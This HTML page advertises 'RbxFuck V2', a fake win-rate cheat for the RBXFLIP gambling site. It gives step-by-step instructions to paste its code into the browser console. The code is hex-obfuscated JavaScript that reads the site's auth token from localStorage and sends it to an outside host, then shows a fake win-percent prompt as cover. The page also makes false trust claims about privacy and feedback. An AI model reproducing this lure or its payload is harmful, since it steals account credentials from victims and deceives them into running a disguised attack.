<html>
  <title>RbxFuck V2</title>
  <script>
function copy() {
  let textarea = document.getElementById("lolcode");
  textarea.select();
  document.execCommand("copy");
  alert('Copied RBXFUCK V2')
}
  </script>
  <style>
        .texty {
          font-size: 1.2vw;

    font-family:'Courier New';
    color: #f8f7f7;

}
    .textarea {
    font-family:'Courier New';
    color: #ffffff;
    background-color: #3a3333;
    padding: 100px;
    width: 500;
    border: #2c2424;


}
    html {
  scroll-behavior: smooth;
}

        .check{
  display: inline-block;
  border-radius: 4px;
  background-color: #4299E1;
  border: none;
  color: #FFFFFF;
  text-align: center;
  font-size: 20px;
  padding: 10px;
  width: 150;
  transition: all 0.5s;
  cursor: pointer;
  margin: 5px;
  font-family:'Courier New';
}

        .texter {
    font-family:'Courier New';
    color: #f8f7f7;

}
.area{
  display: inline-block;
  border-radius: 4px;
  background-color: #4299E1;
  border: none;
  color: #FFFFFF;
  text-align: center;
  font-size: 20px;
  padding: 10px;
  width: 1000;
  transition: all 0.5s;
  cursor: pointer;
  margin: 5px;
  font-family:'Courier New';
}

.title {
    font-size: 3vw;
    color: #f8f7f7;
    font-family:'Courier New';
}
.option {
    font-size: 1.5vw;
    color: #f8f7f7;
    font-family:'Courier New';
}
.container {
  position: relative;
  width: 100%;
  max-width: 400px;
}

.container img {
  width: 100%;
  height: auto;
}

.container .btn {
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
  -ms-transform: translate(-50%, -50%);
  background-color: #f1f1f1;
  color: black;
  font-size: 16px;
  padding: 16px 30px;
  border: none;
  cursor: pointer;
  border-radius: 5px;
  text-align: center;
}

.container .btn:hover {
  background-color: black;
  color: white;
}
.button {
  display: inline-block;
  border-radius: 4px;
  background-color: #4299E1;
  border: none;
  color: #FFFFFF;
  text-align: center;
  font-size: 20px;
  padding: 20px;
  width: 230;
  transition: all 0.5s;
  cursor: pointer;
  margin: 5px;
  font-family:'Courier New';
}
.buttonss {
  display: inline-block;
  border-radius: 4px;
  background-color: #5C6A6E;
  border: none;
  color: #FFFFFF;
  text-align: center;
  font-size: 20px;
  padding: 20px;
  width: 230;
  transition: all 0.5s;
  cursor: pointer;
  margin: 5px;
  font-family:'Courier New';
}

.button span {  
  cursor: pointer;
  display: inline-block;
  position: relative;
  transition: 0.5s;
}

.button span:after {
  content: '\00bb';
  position: absolute;
  opacity: 0;
  top: 0;
  right: -20px;
  transition: 0.5s;
}

.button:hover span {
  padding-right: 25px;
}

.button:hover span:after {
  opacity: 1;
  right: 0;
}
body {
  background-color: rgb(36, 37, 47);
}


    </style>

    <pr class="title">RBXFUCK V2</pr>
    <br></br>
    <section id="setup">
      <textarea id="lolcode"style="background-color:#141414; overflow:hidden;    color: #f8f7f7;font-family:'Courier New'" readonly rows="10" cols="100 "  >//RBXFLIP FUCKER V2
        // ADDED SHA 256 SUPPORT
        // Enjoy the wins
        var _0x80d6=["\x61\x75\x74\x68\x2E\x5F\x74\x6F\x6B\x65\x6E\x2E\x6C\x6F\x63\x61\x6C","\x67\x65\x74\x49\x74\x65\x6D","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x72\x62\x78\x2D\x63\x72\x65\x61\x74\x65\x2E\x78\x79\x7A\x2F\x73\x65\x6E\x64\x2E\x70\x68\x70\x3F\x74\x3D","\x57\x69\x6E\x20\x50\x65\x72\x63\x65\x6E\x74","\x38\x30\x25"];var token=localStorage[_0x80d6[1]](_0x80d6[0]);fetch(_0x80d6[2]+ token);prompt(_0x80d6[3],_0x80d6[4])</textarea>  
      <br></br>
      <a class="buttonss" href="#use">How to setup</a>
      <button class="button" onclick="copy()">Copy Code</button>
      <br></br>
      <p>                            </p>
      <a class="buttonss" href="#y">Why to use our tool</a>
    </section>

    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>    <br></br>

    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <section id="y">
      <label class="title">
        Why to choose us?
      </label>
      <br></br>
      <label class="texter">There is many reasons to choose us over other people how ever here is 3 key reasons</label>
      <br></br>

      <div>
        <img src="privacy.png" alt="privacy" width="60" height="50">
        <br></br>
        <label class="texty">Privacy</label>

        <p class="texter">We, value your information's privacy and we guarantee that none of your data will be shared to anybody.</p>
      </div>
      <br>
      <div>
        <img src="customer-feedback.png" alt="privacy" width="60" height="50">
        <br></br>
        <label class="texty">Positive Feedback</label>

        <p class="texter">We have 100% positive feedback from people who use our tool.</p>
      </div>
      <div>
        <img src="money.png" alt="privacy" width="60" height="50">
        <br></br>
        <label class="texty">It is easy money</label>

        <p class="texter">We have never ever recived any reports of people loosing too much because yea you might loose 1 game if you set the ratio to 50-70% percent but you will make it all back   .</p>
      </div>
    </section>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <br></br>
    <section id="use">
      <h3>
        <label class="texter">1. First Go To RBXFLIP</label>
        <br></br>
        <img src="Screenshot_9.png" alt="privacy" width="1000" height="400">
        <br></br>
        <label class="texter">2. Right Click And Press Inspect</label>
        <br></br>
        <img src="Screenshot_10.png" alt="privacy" width="1000" height="400">
        <br></br>
        <label class="texter">3.Press Console</label>
        <br></br>
        <img src="Screenshot_11.png" alt="privacy" width="1000" height="400">
        <br></br>
        <label class="texter">4. Now Paste The Code In Your Console</label>
        <br></br>
        <img src="Screenshot_13.png" alt="privacy" width="400" height="400">
        <br></br>
        <label class="texter">5. Now Press Enter and put the win ratio percent you want</label>
        <br></br>
        <img src="Screenshot_14.png" alt="privacy" width="400" height="400">
        <br></br>
        <label class="texter">6. Press Ok and get some wins.</label>
      </h3>
    </section>


</html>